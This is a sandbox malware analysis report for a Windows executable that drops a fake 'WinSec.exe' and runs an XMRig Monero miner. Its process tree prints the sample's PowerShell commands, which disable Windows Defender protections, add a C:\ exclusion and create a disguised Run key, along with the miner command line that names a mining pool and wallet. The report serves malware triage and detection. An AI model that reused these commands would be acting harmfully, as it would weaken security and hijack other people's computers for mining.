Overview
overview
10Static
static
10202ad65f39...2f.exe
windows7-x64
10202ad65f39...2f.exe
windows10-2004-x64
102722079047...42.exe
windows7-x64
82722079047...42.exe
windows10-2004-x64
861b08c9b1c...29.exe
windows7-x64
1061b08c9b1c...29.exe
windows10-2004-x64
10a89d4dfabf...a9.exe
windows7-x64
10a89d4dfabf...a9.exe
windows10-2004-x64
10bb1e9db6d9...76.exe
windows7-x64
10bb1e9db6d9...76.exe
windows10-2004-x64
10e9fca3db7f...67.exe
windows7-x64
10e9fca3db7f...67.exe
windows10-2004-x64
10Analysis
-
max time kernel
152s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
07-09-2022 13:02
Behavioral task
behavioral1
Sample
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral3
Sample
27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
Resource
win7-20220812-en
Behavioral task
behavioral4
Sample
27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral5
Sample
61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
Resource
win7-20220812-en
Behavioral task
behavioral6
Sample
61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral7
Sample
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Resource
win7-20220812-en
Behavioral task
behavioral8
Sample
a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Resource
win7-20220812-en
Behavioral task
behavioral10
Sample
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
Resource
win10v2004-20220901-en
Behavioral task
behavioral11
Sample
e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
Resource
win7-20220812-en
Behavioral task
behavioral12
Sample
e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe
Resource
win10v2004-20220812-en
General
-
Target
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
-
Size
5.8MB
-
MD5
27124a76fe1a7d01090183e7eb646b0e
-
SHA1
9612c76890e70d63298e674601921cc3a9bbc00c
-
SHA256
bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776
-
SHA512
1e218f3b9acdc19dc9d915bbe0cf8afd4b4a0804f2a105aaf063a149cc78995a0948327b4086f6b97d35a213ae951a29e6a5bd91e5438b37585e54b8f6fbdda2
-
SSDEEP
98304:FuAXqhdxBaSbIzxiEXUfcZYU5XiG0Yq9VaEZns3VpUCpBx4Yfq8WwnwPNq3HZQ:0AWbNbIzxibcZYDFYXjHBq8WwC8Q
Malware Config
Signatures
-
XMRig Miner payload 3 IoCs
resource yara_rule behavioral9/memory/1708-109-0x0000000140000000-0x0000000140711000-memory.dmp xmrig behavioral9/memory/1708-110-0x0000000140000000-0x0000000140711000-memory.dmp xmrig behavioral9/memory/1708-113-0x0000000140000000-0x0000000140711000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1892 WinSec.exe -
resource yara_rule behavioral9/memory/1708-101-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-103-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-105-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-107-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-108-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-109-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-110-0x0000000140000000-0x0000000140711000-memory.dmp upx behavioral9/memory/1708-113-0x0000000140000000-0x0000000140711000-memory.dmp upx -
Loads dropped DLL 1 IoCs
pid Process 900 bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1892 set thread context of 1708 1892 WinSec.exe 36 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1892 WinSec.exe 612 powershell.exe 2008 powershell.exe 1384 powershell.exe 1472 powershell.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe 1892 WinSec.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1892 WinSec.exe Token: SeDebugPrivilege 612 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1384 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1892 WinSec.exe Token: SeLockMemoryPrivilege 1708 RegAsm.exe Token: SeLockMemoryPrivilege 1708 RegAsm.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 900 wrote to memory of 1892 900 bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe 27 PID 900 wrote to memory of 1892 900 bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe 27 PID 900 wrote to memory of 1892 900 bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe 27 PID 1892 wrote to memory of 1472 1892 WinSec.exe 28 PID 1892 wrote to memory of 1472 1892 WinSec.exe 28 PID 1892 wrote to memory of 1472 1892 WinSec.exe 28 PID 1892 wrote to memory of 1384 1892 WinSec.exe 30 PID 1892 wrote to memory of 1384 1892 WinSec.exe 30 PID 1892 wrote to memory of 1384 1892 WinSec.exe 30 PID 1892 wrote to memory of 612 1892 WinSec.exe 32 PID 1892 wrote to memory of 612 1892 WinSec.exe 32 PID 1892 wrote to memory of 612 1892 WinSec.exe 32 PID 1892 wrote to memory of 2008 1892 WinSec.exe 34 PID 1892 wrote to memory of 2008 1892 WinSec.exe 34 PID 1892 wrote to memory of 2008 1892 WinSec.exe 34 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36 PID 1892 wrote to memory of 1708 1892 WinSec.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Set-MpPreference -PUAProtection 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Add-MpPreference -ExclusionPath C:\3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig163⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.7MB
MD5a419d5d9882f43143818df7122c684a1
SHA163a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA5123d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a
-
Filesize
5.7MB
MD5a419d5d9882f43143818df7122c684a1
SHA163a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA5123d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ac590245904e4b02a2a0f76fee439591
SHA1e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA51276b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ac590245904e4b02a2a0f76fee439591
SHA1e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA51276b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ac590245904e4b02a2a0f76fee439591
SHA1e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA51276b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863
-
Filesize
5.7MB
MD5a419d5d9882f43143818df7122c684a1
SHA163a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA5123d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a